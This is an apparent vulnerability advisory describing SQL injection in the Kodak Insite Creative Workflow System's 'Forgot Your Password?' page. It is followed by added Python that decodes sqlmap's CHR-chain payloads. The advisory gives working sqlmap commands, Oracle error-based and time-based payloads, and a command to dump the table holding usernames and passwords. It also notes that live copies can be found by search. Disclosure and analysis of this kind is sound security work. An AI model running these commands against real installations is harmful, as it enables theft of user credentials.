Kodak Insite Creative Workflow System SQL Injection

🗓️ 19 Feb 2013 00:00:00
Reported by Robert at Hipcrime
Type: packetstorm
🔗 packetstormsecurity.com

SQL injection in the "Forgot Your Password?" page (EmailPassword.asp, POST parameter user_name) of the Kodak Insite Creative Workflow System. The parameter is embedded unescaped in an Oracle query, so an attacker can use error-based or time-based blind injection to read arbitrary data, including all usernames and passwords (the PRINERGY.DBCS_REMOTEUSER table in the reporter's installation). The reporter states that Kodak is expected to release a fix in September.

Code

```
Hello ...

While investigating a recent installation of Kodak's Insite Creative
Workflow System (for my current employer), an SQL Injection vulnerability
was discovered in its "Forgot Your Password?" page.

An example of this application can be seen on the Kodak site.

https://creativeworkflow.kodak.com/TwAmWeb/login.asp

Many other copies of Kodak Insite can be located with any search engine
by looking for the string "insite creative login".

Our installation was set up on an internal site, and as such, SQLMAP was
applied to our local copy, as follows.

sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' -p user_name --risk=3 --level=5 -o

sqlmap identified the following injection points with a total of 163
HTTP(s) requests:
---
Place: POST
Parameter: user_name
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: user_name=1') AND 5065=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)||CHR(110)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5065=5065) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(121)||CHR(112)||CHR(58)||CHR(62))) FROM DUAL) AND ('yCTb'='yCTb&Language=en

Type: AND/OR time-based blind
Title: Oracle OR time-based blind
Payload: user_name=-2979') OR 1635=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(80)||CHR(114)||CHR(122),5) AND ('NjHU'='NjHU&Language=en
---
[11:52:56] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Oracle
[11:52:56] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 44 times

A little fishing around and it becomes obvious that all usernames/passwords
can be downloaded like this:

sqlmap.py -u 'http://localhost/TwAmWeb/EmailPassword.asp' --data='user_name=1&Language=en' --risk=3 --level=5 -o -D PRINERGY -T DBCS_REMOTEUSER --columns --dump

Supposedly Kodak will be releasing a fix in September.

... Robert
```
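The sqlmap payloads in the advisory are hard to read because sqlmap emits every string literal as a CHR(n)||CHR(m)||... chain so that no quote character appears inside the literal. The Python below is an added example, not part of the original advisory and not sqlmap's own code; it folds those chains back into quoted literals, extracts the injected user_name value from the POST body, and pulls out the two things a responder would check: how the value breaks out of the host query's quoting, and the DBMS_PIPE timeout the time-based probe relies on. The two payload strings are copied from the advisory; the function names, and the inference that the application embeds the input as `('...')` (drawn only from the leading `')` and trailing `AND ('x'='x` of the payloads), are the example's own. Decoded, the error-based probe hands XMLType() the string `<:vne:` + value + `:typ:>`; that is not a valid XML name, and Oracle's parse error echoes the offending name back, which is how the error-based technique reads data out of a page that shows no query result.

```python
# Added example (not from the original advisory or from sqlmap): make the
# Oracle sqlmap payloads readable and extract the parts worth checking.
import re
from urllib.parse import parse_qs

# The two payloads exactly as printed in the advisory's sqlmap output,
# joined onto one line each.
ERROR_BASED = (
    "user_name=1') AND 5065=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(118)"
    "||CHR(110)||CHR(101)||CHR(58)||(SELECT (CASE WHEN (5065=5065) THEN 1 "
    "ELSE 0 END) FROM DUAL)||CHR(58)||CHR(116)||CHR(121)||CHR(112)||CHR(58)"
    "||CHR(62))) FROM DUAL) AND ('yCTb'='yCTb&Language=en"
)
TIME_BASED = (
    "user_name=-2979') OR 1635=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(80)"
    "||CHR(114)||CHR(122),5) AND ('NjHU'='NjHU&Language=en"
)

# A run of CHR(n) calls joined by ||, with no trailing || (so the
# concatenation to the next non-CHR term is preserved).
CHR_CHAIN = re.compile(r"CHR\(\d+\)(?:\|\|CHR\(\d+\))*")


def decode_chr_chain(chain):
    """Turn 'CHR(60)||CHR(58)' into '<:' (ASCII code points)."""
    return "".join(chr(int(n)) for n in re.findall(r"CHR\((\d+)\)", chain))


def decode_payload(body):
    """Replace every CHR() chain in a form body with a quoted string literal."""
    return CHR_CHAIN.sub(lambda m: "'" + decode_chr_chain(m.group(0)) + "'", body)


def injected_value(body, param="user_name"):
    """Raw value of one parameter of an x-www-form-urlencoded POST body."""
    return parse_qs(body, keep_blank_values=True)[param][0]


def breakout_tokens(value):
    """How the injected value leaves and re-enters the host query's quoting.

    Returns (prefix, suffix): the leading ') that closes a single-quoted
    literal and a parenthesis, and the trailing AND ('x'='x that reopens
    both so the text the application appends (inferred to be ')') still
    parses. Either is None if the value does not have that shape.
    """
    head = re.match(r"^-?\d+(\'\))", value)
    tail = re.search(r"AND \('(\w+)'='\1$", value)
    return (head.group(1) if head else None, tail.group(0) if tail else None)


def pipe_timeout(value):
    """Seconds DBMS_PIPE.RECEIVE_MESSAGE blocks on an empty pipe, i.e. the
    response delay sqlmap measures for the time-based check; None if the
    value carries no such call."""
    m = re.search(r"DBMS_PIPE\.RECEIVE_MESSAGE\([^,]*,\s*(\d+)\)", value)
    return int(m.group(1)) if m else None


if __name__ == "__main__":
    for body in (ERROR_BASED, TIME_BASED):
        value = injected_value(body)
        print(decode_payload(body))
        print("  breakout:", breakout_tokens(value))
        print("  pipe timeout:", pipe_timeout(value))
```

Run as a script it prints the decoded bodies: the time-based one reads `DBMS_PIPE.RECEIVE_MESSAGE('LPrz',5)`, a five-second wait on a pipe nothing writes to, and the error-based one reads `XMLType('<:vne:'||(SELECT (CASE WHEN (5065=5065) THEN 1 ELSE 0 END) FROM DUAL)||':typ:>')`. Both values begin with `')` and end with `AND ('x'='x`, which is the shape sqlmap produces when the input is spliced into the query between an opening `('` and a closing `')`.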
